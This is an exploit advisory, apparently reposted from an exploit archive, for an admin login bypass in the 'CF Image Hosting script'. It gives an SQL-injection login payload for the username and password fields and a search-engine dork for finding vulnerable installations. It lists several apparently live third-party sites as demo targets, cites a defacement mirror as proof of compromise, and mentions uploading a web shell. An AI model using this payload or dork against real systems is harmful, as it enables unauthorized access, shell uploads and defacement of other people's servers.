facebook facebook twitter rss

Powered By CF Image Hosting script admin page bypass vulnerability / upload shell

Author: Rednofozi , Published: 11-10-2018
# Exploit Title: Powered By CF Image Hosting script admin page bypass vulnerability / upload shell

# Exploit Author: Rednofozi

# Date:2018-10-11

# Email: Rednofozi@yahoo.com

# Vendor Homepage: www.codefuture.co.uk

# OUR SITE : https://anonysec.org
# MY page Exploit: https://www.exploit-db.com/author/?a=2243
|====================================================================================

# {INFO}

# admin bypass Vulnerability

|====================================================================================

# {DORK}

# intext:"Powered By CF Image Hosting script

|====================================================================================

# {POC}

# admin page:

# site.com/admin

# exploit:

# Username: '=''or'

# password: '=''or'

#

# zone-h test hacked http://www.zone-h.org/mirror/id/31702111

|====================================================================================

# {DEMO}

# 01: http://www.irtci.ir/pic/admin.php

# 02: hhttp://image4web.net/admin/

# 03: https://admin.serconi.es/admin

# 04: and upload shell

# 05:

# 06:

# 07:

# 08:

# 09:

# 10:

|====================================================================================

# {TNX For}

# >>> Thanks To: ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow

# >>> Discovered By :Rednofozi

Like us on Facebook :